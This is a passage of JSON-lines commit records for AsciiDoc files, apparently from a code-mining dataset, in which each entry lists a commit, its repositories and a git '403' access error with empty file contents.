403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74c44f45b829795cd37c2fefff22406254a55285","subject":"Update 2015-08-28-A-DIY-Flight-Controller.adoc","message":"Update 2015-08-28-A-DIY-Flight-Controller.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-08-28-A-DIY-Flight-Controller.adoc","new_file":"_posts\/2015-08-28-A-DIY-Flight-Controller.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8753b9f2d2f6b49df263a57d90fdc40e8aa81891","subject":"Update 2015-03-02-Tervetuloa.adoc","message":"Update 2015-03-02-Tervetuloa.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-02-Tervetuloa.adoc","new_file":"_posts\/2015-03-02-Tervetuloa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"267a5b54e7df4b1658ff203b8d20e8fafc2384a0","subject":"Update 20150327-Happy-Easter.adoc","message":"Update 20150327-Happy-Easter.adoc","repos":"mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io","old_file":"_posts\/20150327-Happy-Easter.adoc","new_file":"_posts\/20150327-Happy-Easter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcrotty\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a88e26a3c8dfdd3c7a3b64b84d218cf7097bef80","subject":"Add build instructions. Fixes #152","message":"Add build instructions. 
Fixes #152\n","repos":"canoo\/dolphin-platform,canoo\/dolphin-platform,canoo\/dolphin-platform","old_file":"BUILD.adoc","new_file":"BUILD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/canoo\/dolphin-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5ac047832cd3830a4129177d702046f1ab6e2c38","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f0640fae2a6c37b53a916005678e5899432a6f2","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"622622f3df87d582e178dad0d2cccfd244ae458c","subject":"Renamed '_posts\/2018-09-22-HTT-Prty-JSON-requests-and-the-right-Content-Type.adoc' to '_posts\/2018-09-22-Series-on-Rails-Part-1.adoc'","message":"Renamed '_posts\/2018-09-22-HTT-Prty-JSON-requests-and-the-right-Content-Type.adoc' to '_posts\/2018-09-22-Series-on-Rails-Part-1.adoc'","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2018-09-22-Series-on-Rails-Part-1.adoc","new_file":"_posts\/2018-09-22-Series-on-Rails-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0ad7a4db8953ee64663b86e2432ae3ca297425f","subject":"Release 1.5.1 blog","message":"Release 1.5.1 blog\n","repos":"apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2018-08-13-release-1.5.adoc","new_file":"_blog-src\/_posts\/2018-08-13-release-1.5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd28d95d9a9c2509a7e0d17af2c9ffcf6dcfc8f9","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c010c13645a9bfd731676b578652acf35ec0166","subject":"Update 
2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b71afc9009fb2d6f3699e1603b805cbed196477","subject":"Create ISSUE_TEMPLATE.adoc","message":"Create ISSUE_TEMPLATE.adoc","repos":"jenkinsci\/github-pullrequest-plugin,KostyaSha\/github-integration-plugin,KostyaSha\/github-integration-plugin,KostyaSha\/github-integration-plugin,KostyaSha\/github-integration-plugin,jenkinsci\/github-integration-plugin,jenkinsci\/github-integration-plugin,jenkinsci\/github-pullrequest-plugin,jenkinsci\/github-pullrequest-plugin,jenkinsci\/github-integration-plugin","old_file":".github\/ISSUE_TEMPLATE.adoc","new_file":".github\/ISSUE_TEMPLATE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/github-integration-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de5a468ce86f243fe3e12464aeba47c008e0fb1e","subject":"y2b create post A Truly Wireless iPhone?","message":"y2b create post A Truly Wireless iPhone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-13-A-Truly-Wireless-iPhone.adoc","new_file":"_posts\/2016-01-13-A-Truly-Wireless-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9c11c95441fa41a3bb38831148128db97542dab","subject":"README: document filters","message":"README: document 
filters\n","repos":"Somasis\/kakoune,alexherbo2\/kakoune,casimir\/kakoune,flavius\/kakoune,danr\/kakoune,danr\/kakoune,Somasis\/kakoune,alexherbo2\/kakoune,danielma\/kakoune,flavius\/kakoune,rstacruz\/kakoune,flavius\/kakoune,zakgreant\/kakoune,jkonecny12\/kakoune,ekie\/kakoune,Somasis\/kakoune,elegios\/kakoune,danielma\/kakoune,occivink\/kakoune,xificurC\/kakoune,jkonecny12\/kakoune,rstacruz\/kakoune,rstacruz\/kakoune,alexherbo2\/kakoune,casimir\/kakoune,alpha123\/kakoune,Asenar\/kakoune,elegios\/kakoune,zakgreant\/kakoune,Asenar\/kakoune,alexherbo2\/kakoune,occivink\/kakoune,alpha123\/kakoune,lenormf\/kakoune,danr\/kakoune,mawww\/kakoune,danr\/kakoune,xificurC\/kakoune,lenormf\/kakoune,mawww\/kakoune,Asenar\/kakoune,ekie\/kakoune,jkonecny12\/kakoune,mawww\/kakoune,mawww\/kakoune,flavius\/kakoune,zakgreant\/kakoune,occivink\/kakoune,ekie\/kakoune,casimir\/kakoune,xificurC\/kakoune,alpha123\/kakoune,alpha123\/kakoune,jkonecny12\/kakoune,jjthrash\/kakoune,ekie\/kakoune,occivink\/kakoune,rstacruz\/kakoune,Asenar\/kakoune,zakgreant\/kakoune,jjthrash\/kakoune,casimir\/kakoune,elegios\/kakoune,jjthrash\/kakoune,xificurC\/kakoune,elegios\/kakoune,lenormf\/kakoune,lenormf\/kakoune,danielma\/kakoune,Somasis\/kakoune,danielma\/kakoune,jjthrash\/kakoune","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"4f466e1453390eedfc2b82b65480608e8867471a","subject":"Add new versioned document for planning.","message":"Add new versioned document for planning.\n\nWe'll see it progress just like the code!\n","repos":"lukesanantonio\/notetaking,thee-l\/notetaking,thee-l\/notetaking,lukesanantonio\/notetaking","old_file":"PLANNING.asciidoc","new_file":"PLANNING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thee-l\/notetaking.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"2870ed2e104114a25a2d3a7fc42c9779c1b4e512","subject":"Update 2016-01-12-Another-post.adoc","message":"Update 2016-01-12-Another-post.adoc","repos":"vadio\/vadio.github.io,vadio\/vadio.github.io,vadio\/vadio.github.io","old_file":"_posts\/2016-01-12-Another-post.adoc","new_file":"_posts\/2016-01-12-Another-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vadio\/vadio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"052779cac0ac3f4a20673a405cbb5504000df2aa","subject":"doc: implementers-guide: update names of test module libraries","message":"doc: implementers-guide: update names of test module libraries\n\nThe name of the libraries generated by the test modules were recently\nchanged from lib<module>.la to libtest<module>.la\n\nSigned-off-by: Stuart Haslam <1fce01f364ef5298e64e07a42e08efeef153fa98@linaro.org>\nReviewed-by: Christophe Milard <99616a981fa4477cda708a70f78076761c0c9f1c@linaro.org>\nSigned-off-by: Maxim Uvarov 
<db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"rsalveti\/odp,rsalveti\/odp,erachmi\/odp,kalray\/odp-mppa,kalray\/odp-mppa,ravineet-singh\/odp,erachmi\/odp,dkrot\/odp,ravineet-singh\/odp,nmorey\/odp,rsalveti\/odp,mike-holmes-linaro\/odp,erachmi\/odp,kalray\/odp-mppa,nmorey\/odp,dkrot\/odp,mike-holmes-linaro\/odp,rsalveti\/odp,kalray\/odp-mppa,ravineet-singh\/odp,nmorey\/odp,rsalveti\/odp,kalray\/odp-mppa,mike-holmes-linaro\/odp,erachmi\/odp,kalray\/odp-mppa,dkrot\/odp,nmorey\/odp,dkrot\/odp,mike-holmes-linaro\/odp,kalray\/odp-mppa,ravineet-singh\/odp","old_file":"doc\/implementers-guide\/implementers-guide.adoc","new_file":"doc\/implementers-guide\/implementers-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b91547bd2385b67a152f950de6369d5460b2ef1a","subject":"Update 2016-04-06-Crackeando-contrasenas.adoc","message":"Update 2016-04-06-Crackeando-contrasenas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Crackeando-contrasenas.adoc","new_file":"_posts\/2016-04-06-Crackeando-contrasenas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83266f4852b26eb6526fb6d711455cbd7c5900b7","subject":"Update 2015-07-22-Happy-Birthday-from-GWCATT.adoc","message":"Update 2015-07-22-Happy-Birthday-from-GWCATT.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-07-22-Happy-Birthday-from-GWCATT.adoc","new_file":"_posts\/2015-07-22-Happy-Birthday-from-GWCATT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90fcba0f1810eff93df391f7afd0ee3dd0571e19","subject":"Deleted 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","message":"Deleted 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_file":"04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b409b78b602d8732dfa3b0239b1f5db54e2fa097","subject":"blog: open benchmarks for the win","message":"blog: open benchmarks for the win\n","repos":"bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website","old_file":"blog\/2014-11-07-OpenBenchmarksForTheWin.adoc","new_file":"blog\/2014-11-07-OpenBenchmarksForTheWin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL 
returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9dcc2e4d68e4f9c2dff0d2b8fa23589fc9ca7803","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39b8612c30c539e2bda7fd1fecaf2b3467754bfb","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6491ab3b6dc5d669306809850766f231fac368a1","subject":"Update 2017-03-10-Native-Script-Brasil.adoc","message":"Update 2017-03-10-Native-Script-Brasil.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-03-10-Native-Script-Brasil.adoc","new_file":"_posts\/2017-03-10-Native-Script-Brasil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1146f51c8e5078599aa5249bc649b0432678ffab","subject":"add decision to use AsciiDoc","message":"add decision to use AsciiDoc\n","repos":"Drakojin\/livingdoc2,pkleimann\/livingdoc,pkleimann\/livingdoc2,LivingDoc\/livingdoc,pkleimann\/livingdoc2,bitterblue\/livingdoc2,LivingDoc\/livingdoc,Drakojin\/livingdoc2,bitterblue\/livingdoc2,pkleimann\/livingdoc,pkleimann\/livingdoc,testIT-LivingDoc\/livingdoc2,LivingDoc\/livingdoc,bitterblue\/livingdoc2,testIT-LivingDoc\/livingdoc2,Drakojin\/livingdoc2","old_file":"doc\/decisions\/adr-002-use-asciidoc-markup.adoc","new_file":"doc\/decisions\/adr-002-use-asciidoc-markup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitterblue\/livingdoc2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad2892c6b3f2d5da660b8a7e4c64ad4770047868","subject":"Add README to starters","message":"Add README to starters\n\nBasic README content plus a short table of community-\ncontributed additional starters.\n\nSee 
gh-539\n","repos":"isopov\/spring-boot,wilkinsona\/spring-boot,xingguang2013\/spring-boot,linead\/spring-boot,ApiSecRay\/spring-boot,auvik\/spring-boot,duandf35\/spring-boot,roberthafner\/spring-boot,vpavic\/spring-boot,xialeizhou\/spring-boot,kdvolder\/spring-boot,lingounet\/spring-boot,gregturn\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,deki\/spring-boot,mbenson\/spring-boot,frost2014\/spring-boot,jjankar\/spring-boot,krmcbride\/spring-boot,designreuse\/spring-boot,sungha\/spring-boot,royclarkson\/spring-boot,eddumelendez\/spring-boot,vpavic\/spring-boot,wwadge\/spring-boot,rweisleder\/spring-boot,afroje-reshma\/spring-boot-sample,mevasaroj\/jenkins2-course-spring-boot,javyzheng\/spring-boot,prakashme\/spring-boot,nevenc-pivotal\/spring-boot,vakninr\/spring-boot,zhanhb\/spring-boot,xwjxwj30abc\/spring-boot,lcardito\/spring-boot,RobertNickens\/spring-boot,paweldolecinski\/spring-boot,domix\/spring-boot,pnambiarsf\/spring-boot,yhj630520\/spring-boot,donhuvy\/spring-boot,jeremiahmarks\/spring-boot,sbcoba\/spring-boot,mbnshankar\/spring-boot,xingguang2013\/spring-boot,minmay\/spring-boot,bjornlindstrom\/spring-boot,xwjxwj30abc\/spring-boot,izestrea\/spring-boot,navarrogabriela\/spring-boot,herau\/spring-boot,5zzang\/spring-boot,clarklj001\/spring-boot,fireshort\/spring-boot,panbiping\/spring-boot,keithsjohnson\/spring-boot,jayeshmuralidharan\/spring-boot,frost2014\/spring-boot,dnsw83\/spring-boot,jcastaldoFoodEssentials\/spring-boot,axelfontaine\/spring-boot,master-slave\/spring-boot,vaseemahmed01\/spring-boot,RobertNickens\/spring-boot,mdeinum\/spring-boot,cbtpro\/spring-boot,RainPlanter\/spring-boot,rickeysu\/spring-boot,lcardito\/spring-boot,rmoorman\/spring-boot,hklv\/spring-boot,hello2009chen\/spring-boot,AstaTus\/spring-boot,paweldolecinski\/spring-boot,jorgepgjr\/spring-boot,kamilszymanski\/spring-boot,dfa1\/spring-boot,spring-projects\/spring-boot,rams2588\/spring-boot,vakninr\/spring-boot,peteyan\/spring-boot,mdeinum\/spring-boot,panbiping\/spring-boot,jeremiahmarks\/spring-boot,mouadtk\/spring-boot,jmnarloch\/spring-boot,simonnordberg\/spring-boot,nandakishorm\/spring-boot,designreuse\/spring-boot,Buzzardo\/spring-boot,javyzheng\/spring-boot,navarrogabriela\/spring-boot,roymanish\/spring-boot,srikalyan\/spring-boot,olivergierke\/spring-boot,joansmith\/spring-boot,qq83387856\/spring-boot,domix\/spring-boot,liupugong\/spring-boot,linead\/spring-boot,izeye\/spring-boot,tbbost\/spring-boot,RishikeshDarandale\/spring-boot,bjornlindstrom\/spring-boot,rams2588\/spring-boot,johnktims\/spring-boot,liupugong\/spring-boot,zhangshuangquan\/spring-root,lingounet\/spring-boot,tbbost\/spring-boot,donthadineshkumar\/spring-boot,mouadtk\/spring-boot,srinivasan01\/spring-boot,joansmith\/spring-boot,imranansari\/spring-boot,xiaoleiPENG\/my-project,mrumpf\/spring-boot,Chomeh\/spring-boot,kdvolder\/spring-boot,nurkiewicz\/spring-boot,mackeprm\/spring-boot,axelfontaine\/spring-boot,smilence1986\/spring-boot,donthadineshkumar\/spring-boot,philwebb\/spring-boot,joshthornhill\/spring-boot,paddymahoney\/spring-boot,brettwooldridge\/spring-boot,marcellodesales\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,hqrt\/jenkins2-course-spring-boot,snicoll\/spring-boot,philwebb\/spring-boot-concourse,eric-stanley\/spring-boot,tbadie\/spring-boot,yunbian\/spring-boot,kayelau\/spring-boot,drumonii\/spring-boot,vandan16\/Vandan,mosoft521\/spring-boot,sbuettner\/spring-boot,MasterRoots\/spring-boot,mbenson\/spring-boot,wilkinsona\/spring-boot,keithsjohnson\/spring-boot,jxblum\/spring-boo
t,tsachev\/spring-boot,soul2zimate\/spring-boot,ilayaperumalg\/spring-boot,coolcao\/spring-boot,Buzzardo\/spring-boot,lenicliu\/spring-boot,ptahchiev\/spring-boot,jorgepgjr\/spring-boot,mohican0607\/spring-boot,herau\/spring-boot,kamilszymanski\/spring-boot,166yuan\/spring-boot,jjankar\/spring-boot,shakuzen\/spring-boot,bbrouwer\/spring-boot,jvz\/spring-boot,qerub\/spring-boot,prakashme\/spring-boot,VitDevelop\/spring-boot,Makhlab\/spring-boot,mdeinum\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,cmsandiga\/spring-boot,mosoft521\/spring-boot,existmaster\/spring-boot,candrews\/spring-boot,roymanish\/spring-boot,roymanish\/spring-boot,mebinjacob\/spring-boot,10045125\/spring-boot,DeezCashews\/spring-boot,jrrickard\/spring-boot,DONIKAN\/spring-boot,yuxiaole\/spring-boot,htynkn\/spring-boot,joansmith\/spring-boot,brettwooldridge\/spring-boot,end-user\/spring-boot,srinivasan01\/spring-boot,gorcz\/spring-boot,smilence1986\/spring-boot,xialeizhou\/spring-boot,shangyi0102\/spring-boot,pvorb\/spring-boot,eddumelendez\/spring-boot,izeye\/spring-boot,axelfontaine\/spring-boot,rstirling\/spring-boot,hello2009chen\/spring-boot,mbenson\/spring-boot,na-na\/spring-boot,zhanhb\/spring-boot,gorcz\/spring-boot,mlc0202\/spring-boot,orangesdk\/spring-boot,meftaul\/spring-boot,mbnshankar\/spring-boot,axibase\/spring-boot,artembilan\/spring-boot,akmaharshi\/jenkins,kiranbpatil\/spring-boot,mike-kukla\/spring-boot,kayelau\/spring-boot,nisuhw\/spring-boot,PraveenkumarShethe\/spring-boot,nghialunhaiha\/spring-boot,mbrukman\/spring-boot,qq83387856\/spring-boot,johnktims\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,end-user\/spring-boot,i007422\/jenkins2-course-spring-boot,rizwan18\/spring-boot,raiamber1\/spring-boot,akmaharshi\/jenkins,RichardCSantana\/spring-boot,zhangshuangquan\/spring-root,mbrukman\/spring-boot,gregturn\/spring-boot,Charkui\/spring-boot,linead\/spring-boot,lenicliu\/spring-boot,lexandro\/spring-boot,nareshmiriyala\/spring-boot,kdvolder\/spring-boot,sbuettner\/spring-boot,philwebb\/spring-boot,cmsandiga\/spring-boot,donthadineshkumar\/spring-boot,tbadie\/spring-boot,ojacquemart\/spring-boot,SaravananParthasarathy\/SPSDemo,cmsandiga\/spring-boot,nisuhw\/spring-boot,balajinsr\/spring-boot,mrumpf\/spring-boot,Nowheresly\/spring-boot,bjornlindstrom\/spring-boot,xwjxwj30abc\/spring-boot,axelfontaine\/spring-boot,Chomeh\/spring-boot,meloncocoo\/spring-boot,kiranbpatil\/spring-boot,yunbian\/spring-boot,5zzang\/spring-boot,damoyang\/spring-boot,srinivasan01\/spring-boot,javyzheng\/spring-boot,Chomeh\/spring-boot,jvz\/spring-boot,5zzang\/spring-boot,mbnshankar\/spring-boot,damoyang\/spring-boot,jayarampradhan\/spring-boot,yunbian\/spring-boot,liupugong\/spring-boot,lif123\/spring-boot,imranansari\/spring-boot,ameraljovic\/spring-boot,fjlopez\/spring-boot,raiamber1\/spring-boot,htynkn\/spring-boot,raiamber1\/spring-boot,nareshmiriyala\/spring-boot,axelfontaine\/spring-boot,crackien\/spring-boot,ollie314\/spring-boot,mebinjacob\/spring-boot,marcellodesales\/spring-boot,crackien\/spring-boot,Xaerxess\/spring-boot,philwebb\/spring-boot-concourse,cleverjava\/jenkins2-course-spring-boot,tsachev\/spring-boot,tbadie\/spring-boot,rmoorman\/spring-boot,jrrickard\/spring-boot,ilayaperumalg\/spring-boot,drumonii\/spring-boot,vandan16\/Vandan,ApiSecRay\/spring-boot,balajinsr\/spring-boot,nandakishorm\/spring-boot,royclarkson\/spring-boot,5zzang\/spring-boot,sbuettner\/spring-boot,lexandro\/spring-boot,artembilan\/spring-boot,forestqqqq\/spring-boot,philwebb\/spring-boot-concourse,afroje-reshma\/spring
-boot-sample,dfa1\/spring-boot,minmay\/spring-boot,jorgepgjr\/spring-boot,jack-luj\/spring-boot,philwebb\/spring-boot,bijukunjummen\/spring-boot,Nowheresly\/spring-boot,shangyi0102\/spring-boot,sebastiankirsch\/spring-boot,jayeshmuralidharan\/spring-boot,clarklj001\/spring-boot,eliudiaz\/spring-boot,Buzzardo\/spring-boot,SPNilsen\/spring-boot,isopov\/spring-boot,drunklite\/spring-boot,buobao\/spring-boot,krmcbride\/spring-boot,mlc0202\/spring-boot,mrumpf\/spring-boot,orangesdk\/spring-boot,johnktims\/spring-boot,fulvio-m\/spring-boot,nghialunhaiha\/spring-boot,liupd\/spring-boot,existmaster\/spring-boot,bbrouwer\/spring-boot,mackeprm\/spring-boot,vandan16\/Vandan,lcardito\/spring-boot,gauravbrills\/spring-boot,VitDevelop\/spring-boot,JiweiWong\/spring-boot,nevenc-pivotal\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,imranansari\/spring-boot,duandf35\/spring-boot,nisuhw\/spring-boot,jforge\/spring-boot,hqrt\/jenkins2-course-spring-boot,satheeshmb\/spring-boot,pnambiarsf\/spring-boot,satheeshmb\/spring-boot,eddumelendez\/spring-boot,duandf35\/spring-boot,dreis2211\/spring-boot,nelswadycki\/spring-boot,166yuan\/spring-boot,drunklite\/spring-boot,nurkiewicz\/spring-boot,M3lkior\/spring-boot,jayarampradhan\/spring-boot,nareshmiriyala\/spring-boot,royclarkson\/spring-boot,buobao\/spring-boot,mdeinum\/spring-boot,michael-simons\/spring-boot,AngusZhu\/spring-boot,DeezCashews\/spring-boot,coolcao\/spring-boot,murilobr\/spring-boot,jxblum\/spring-boot,afroje-reshma\/spring-boot-sample,SaravananParthasarathy\/SPSDemo,rstirling\/spring-boot,lucassaldanha\/spring-boot,NetoDevel\/spring-boot,jjankar\/spring-boot,mabernardo\/spring-boot,vpavic\/spring-boot,dnsw83\/spring-boot,MasterRoots\/spring-boot,ollie314\/spring-boot,lif123\/spring-boot,jbovet\/spring-boot,mbogoevici\/spring-boot,nurkiewicz\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,afroje-reshma\/spring-boot-sample,habuma\/spring-boot,deki\/spring-boot,RainPlanter\/spring-boot,ilayaperumalg\/spring-boot,Pokbab\/spring-boot,olivergierke\/spring-boot,scottfrederick\/spring-boot,mike-kukla\/spring-boot,i007422\/jenkins2-course-spring-boot,AstaTus\/spring-boot,mike-kukla\/spring-boot,xingguang2013\/spring-boot,chrylis\/spring-boot,fulvio-m\/spring-boot,RobertNickens\/spring-boot,zhanhb\/spring-boot,wwadge\/spring-boot,ihoneymon\/spring-boot,xdweleven\/spring-boot,mebinjacob\/spring-boot,lingounet\/spring-boot,prakashme\/spring-boot,joshthornhill\/spring-boot,thomasdarimont\/spring-boot,htynkn\/spring-boot,jmnarloch\/spring-boot,trecloux\/spring-boot,M3lkior\/spring-boot,damoyang\/spring-boot,rmoorman\/spring-boot,hklv\/spring-boot,pnambiarsf\/spring-boot,lucassaldanha\/spring-boot,smilence1986\/spring-boot,mohican0607\/spring-boot,lcardito\/spring-boot,JiweiWong\/spring-boot,bsodzik\/spring-boot,cleverjava\/jenkins2-course-spring-boot,mosen11\/spring-boot,bjornlindstrom\/spring-boot,joshiste\/spring-boot,master-slave\/spring-boot,nghialunhaiha\/spring-boot,DONIKAN\/spring-boot,AngusZhu\/spring-boot,xc145214\/spring-boot,izestrea\/spring-boot,akmaharshi\/jenkins,gregturn\/spring-boot,panbiping\